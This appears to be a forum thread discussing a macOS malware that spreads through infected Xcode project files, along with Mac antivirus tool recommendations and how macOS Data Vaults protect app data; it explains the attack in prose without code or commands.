Does anyone know a good command line malware/antivirus checker for Mac? (Paid is fine.) I do not want the antivirus to run in the background continuously (which affects performance) yet want to have ability to run nightly scans to ensure that the machine is not infected.
Almost all traditional antivirus products want to deeply integrate with the system and affect the performance a lot. Also some of these companies are know to make questionable decisions like trying to intercept HTTPS communication, etc.
It picks up background daemon tasks that suddenly are created and allows you to block them immediately. That's certainly one major way to pick up and block hidden malware on your computer.
All of the tools by this guy are incredible, they are also recommended, e.g. tools to pick up and allow you to block access to microphone or camera.
... and definitely read objective-see's blog post from time to time if you are into security topics. The malware take-apart documentation is extremely enlightening.
(Intereseting fact: A lot of malware quits immediately if Little Snitch is installed. So running Little Snitch alone prevents some malware from infecting your system)
I would bet that whatever the answer is, you'd find it best by looking into what kind of antivirus software is used by ISP/business mail servers to malware-scan attachments during send/receive.
I don't know if it would work for a Mac, but on my personal Windows machine every month I boot on a "Kaspersky Rescue Disk" and do an offline scan of all my drives.
KRD is just a live Linux distro with Kaspersky's tools on it.
That's licensed under GPLv2, available for download without any kind of key/password, and includes build instructions. The poster on mac could even use homebrew to install it with one command.
And they even include instructions for mirroring the signatures here:
Already replied to another comment with this but you could try https://sqwarq.com/detectx/ which has command line usage included. (Not affiliated with them)
The only two I know of is Malwarebytes and Kaspersky.
The former installs with root privileges, runs on boot and cannot be ever closed, despite the fact that it is only an on-demand scanner. I've written to them to request an explanation, and did not get any response.
Kaspersky has had a fair share of rumors against it, and I am not in a position to evaluate if they are trustworthy.
> Malwarebytes […] installs with root privileges, runs on boot and cannot be ever closed, despite the fact that it is only an on-demand scanner. I've written to them to request an explanation, and did not get any response.
Because they try to up-sell you their paid option, which scans automatically for you, with a 30-day trial.
This virus infected Delphi installations, injecting its code and compiling it into a system library. All programs using the infected library contained the virus, including some popular ones.
Because they came straight from the developer, and the virus didn't do anything unless you had Delphi installed they were often considered false positive when they weren't. Originally, it had no malicious payload beside its replication mechanism.
> Affected developers will unwittingly distribute the malicious trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files.
To understand why this happens, it's important to know how massive a typical .pbxproj file looks:
Ostensibly it's human-readable, but because it's generated by Xcode and filled with inscrutable UUIDs, people treat it like a binary file, and they're trained to do so:
So why does this matter? Because the brilliance of this attack is how it "jumps the blood-brain barrier" between a developer's machine and their canonical codebase. Usually, code review and auditing of what goes into a commit prevents this kind of attack from leaping to VCS. But Apple makes the pbxproj so inscrutable, and does such a good job at hiding all its complexity behind (usually well-designed) wizards and dropdown menus, that people take it for granted. If code shows up there, people believe Apple intended that to be the case even if, say, your last commit was a small change in Interface Builder (or whatever they call it nowadays). Your code reviewer might just skip the file entirely, because they've been trained to expect the same.
And that's scary.
At the end of the day, this is just another way of exploiting the lack of a mature and centralized CI ecosystem in the modern package distribution world. There's no organization running a security-minded linter on pbxproj files as a general rule. But, then again, there doesn't need to be a linter on package.json or project.clj or Makefiles because there was never a history of hiding complexity - if that file changes, you'd better darn well know what you're doing. What we have here is a perfect storm of move-fast-break-things package management, a file designed to slip through code reviews, and a pretty creatively designed malware payload.
EDIT: Perhaps another way to look at it is that having one file responsible for both compilation logic and non-compilation-related IDE-specific file status can be problematic. It's like your Makefile also needs to be your .gitignore-but-only-top-level-is-allowed-and-all-files-need-to-be-whitelisted. Of course, this is very much an Apple thing to do.
Xcode project (pbxproj) is simply ill-equipped for proper code reviews. Any modest size team should remove their Xcode projects from their codebase and move to either Bazel, Swift Package Manager or Xcodegen. It is really not that difficult and the benefit is quite obvious: https://liuliu.me/eyes/migrating-ios-project-to-bazel-a-real...
For a single developer I think it works OK to review pbxproj changes like other source.
You really should understand and recognize what each change is.
It’s when you have the additional dimension of multiple developers changing the project that it really becomes unwieldy and you are pushed into treating it as binary.
If you are already familiar with Bazel or don't mind spending a week to learn, sure. I manage all my personal projects in Bazel as well.
Otherwise, many people have positive experience with XcodeGen and that is more close to Xcode project format than Bazel. Besides, you can continue to use Carthage / CocoaPods with that.
> Ostensibly it's human-readable, but because it's generated by Xcode and filled with inscrutable UUIDs, people treat it like a binary file
Inscrutable? It seems like a textual dump of in-memory project structure using UUIDs to represent pointers and links (graph). Yeah, it's a chore to follow manually, but even to me, who has seen this format for the first time ever, it looks rather straightforward. Hasn't anyone written a utility "explorer" of these files?
The problem isn't so much that the format is hard to follow - it's that it's unclear what things do. Are those comments towards the end necessary? If there was a weird string somewhere containing AppleScript, how would I know that's not something that an updated version of Xcode decided was necessary due to a feature I activated, perhaps as a side effect of using a new UI element?
Wow, the way it spreads is fascinating, reminiscent of Reflections on Trusting Trust.
I'm a bit confused about
>two zero-day exploits: one is used to steal cookies via a flaw in the behavior of Data Vaults, another is used to abuse the development version of Safari.
Malware on the local machine can steal data from Safari on the local machine. Is that a surprise? Does Safari have a threat model that it intends to protect against locally running malware?
Data vaults on macOS are intended to prevent apps running under they same unprivileged user from accessing files that belong to another app.
Eg, if there is a file/directory that only safari is meant to have access to, no other app should be able to read it, without at least bringing up one of the annoying “allow X to access your Y”. For example, the first time you, say, feel your home directory you’ll get a bunch of TCC requests asking if the host app (Terminal.app say) should be allowed to access those files.
To add to this: there are two different types of Data Vaults. For locations such as ~/Pictures, ~/Documents, Calendars, Contacts, etc. a permission prompt is triggered if an app tries to access it. Other locations, such as where Mail and Safari keep their data, can not be allowed from a prompt. Those require "Full Disk Access" for third-party software to gain access, which you should give only to applications that really need it, such as a backup tool.
Anything not on those locations is not protected, so there's no Data Vault for Chrome's cookie file, for example.
Is there an API that allows apps to construct data vaults? I assumed that there would be, but I also generally don't write code at that level in the stack
Interesting, macOS has a much stricter permission system than I'm used to on Windows and Linux. On Windows and Linux malware could just start controlling the mouse and keyboard and thus control the browser to get data from it, but on macOS apparently to control the mouse and keyboard some special permission is needed.
> Wow, the way it spreads is fascinating, reminiscent of Reflections on Trusting Trust.
Interestingly it's happened to Xcode before, and an impressive number of bad apps made it to the App Store as a result. See https://en.wikipedia.org/wiki/XcodeGhost.
XcodeGhost wasn’t an attack like this. That was a compromised version of Xcode. This doesn’t require a compromised version of Xcode; it infects Xcode projects. To perhaps put it into more familiar terms, this is as if a malicious Makefile goes around rewriting other Makefiles to include itself.
XcodeGhost was an attack like this in the context of Thompson's lecture, mentioned by Thorrez. Neither fully lives up to Thompson's premise, though. XcodeGhost is the closer of the two.
I was always under the impression that the point of sandboxing was to keep an application exploit from compromising the system. Not to keep the application safe from the system.
Indeed, the project's compiled binary doesn't contain malicious code, but the act of compiling the project causes the malicious code (which is just a binary blob) to execute and infect the system.
But if I pull that code and compile it, my executable will have the malware in it? I've never done anything in the MacOS ecosystem at all, so I'm just asking.
No, if you pull that code and "compile" it with xcode, it will run scripts that install malware on your machine. I assume once the malware is on your machine, it can infect other xcode projects on your machine.
No risk as previous replier mentioned. I provided only the repo names for people who are afraid that they might have dependencies on an infected project.
Almost all traditional antivirus products want to deeply integrate with the system and affect the performance a lot. Also some of these companies are know to make questionable decisions like trying to intercept HTTPS communication, etc.